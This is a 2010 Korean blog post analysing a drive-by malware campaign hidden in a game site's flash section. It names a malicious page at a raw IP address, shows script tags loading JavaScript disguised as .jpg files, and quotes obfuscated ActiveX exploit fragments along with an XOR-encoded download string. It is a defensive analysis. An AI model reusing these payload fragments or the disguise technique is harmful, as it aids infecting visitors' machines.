posted by Kwan's 2010. 5. 11. 22:25

주전자 닷컴 사이트 플레시 게임란에 어제 악성코드 유포하는것을 보았다.
플레시 게임을 시작 버튼에 숨겨져 있는것으로 현재는 유포하는지 모르겠다.
그 페이지 안에는 http://211.234.118.207/main.html 이라는것이 숨겨져있다 물론 악성코드이다.
일반 익스플로러로 켠다면 절대 보이지 않을것이다. main.html 을 자세히 열어보면
<SCRIPT LANGUAGE="JavaScript"> <!-- Hide 라는 표시 때문에 일반 익스플로러는 내부를 보지 못한다.


이 그림에서와 같이 main.html은

</SCRIPT>
<script src="rl.jpg"></script>
<script src="yt1.jpg"></script>
<script src="ytl.jpg"></script>

이것의 공유지임을 알수있다. 이 3파일중 하나는 분명 최종파일 exe 를 유포할껄 직감을 했다. 좀더 나는 안쪽으로 들어가서
rl.jpg ~ ytl.jpg 까지 살펴보았다. 처음에는 rl.jpg 에서 유포하는것으로 알고있었지만 코드가 해석 되지 못했다. 그러므로 패쓰하고
yt1.jpg로 넘어갔다.
yt1.jpg를 살펴보니 !!

try
 {
   new ActiveXObject("kYTx");
 }
 catch (e)
 {
   var YTMTV="%ud5db%uc9c9%u87cd%u9292%uc8d7%udad3%ud2da%udcd0%ud4d3%u93dc%ud8d3%udbdb%uded4%ud8d4%uc9d3%ude93%u93d2%ucfd6%uc992%uced8%u93c9%uc5d8%uBDd8%uBD";
   var YTavp123="%u58yutianayt58%u58yutianayt58%u10yutianaytEB%u4Byutianayt5B%uC9yutianayt33%uB9yutianayt66%u03yutianaytB8%u34yutianayt80%uBDyutianayt0B%uFAE2%u05yutianaytEB%uEByutianaytE8%uFFyutianaytFF";
   var YTavp1=(YTavp123.r-place(/yutianayt/g,""));
 }

이런 코드를 볼수있다. 여기서 나는 약간의 도움을 청했다. 막막했기 때문이다. 네이트온으로 도움을 부탁 드린 후 다시 코드 해석을 해보았다.
잡다한 코드 빼놓고는 중요코드는

var YTMTV="%ud5db%uc9c9%u87cd%u9292%uc8d7%udad3%ud2da%udcd0%ud4d3%u93dc%ud8d3%udbdb%uded4%ud8d4%uc9d3%ude93%u93d2%ucfd6%uc992%uced8%u93c9%uc5d8%uBDd8%uBD 이것이었다.

Hex 를 하니 이런 값이 보였다.

dbd5c9c9cd879292d7c8d3dadad2d0dcd3d4dc93d3d8dbdbd4ded4d8d3c993ded293d6cf92c9d8cec993d8c5d8BDBD 

이코드는 어디서 많이 봤던거 같다. 예전에 유포됐던 파일의 값 과 매우 유사하다!
이값을 다시 paste as hex 로 붙여 검색을 해보니 역시 xor 값은bd 였다.

이 그림과 같이 최종파일이 나오는걸 볼수있다.
처음에는 많이 당황했었지만 한번더 생각해보고 푼다면 쉽게 풀릴수있던것이다!

댓글을 달아 주세요

  1. 121312214121 2013.06.28 18:37  Addr  Edit/Del  Reply

    http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fwww.zuzunza.com%2Ffg%2Fimg%2Fgreen%2Fmid_top_btn01_on.gif&client=googlechrome&hl=ko
    구글 에서 주전자닷컴 진단했더니 이렇게 떳다네여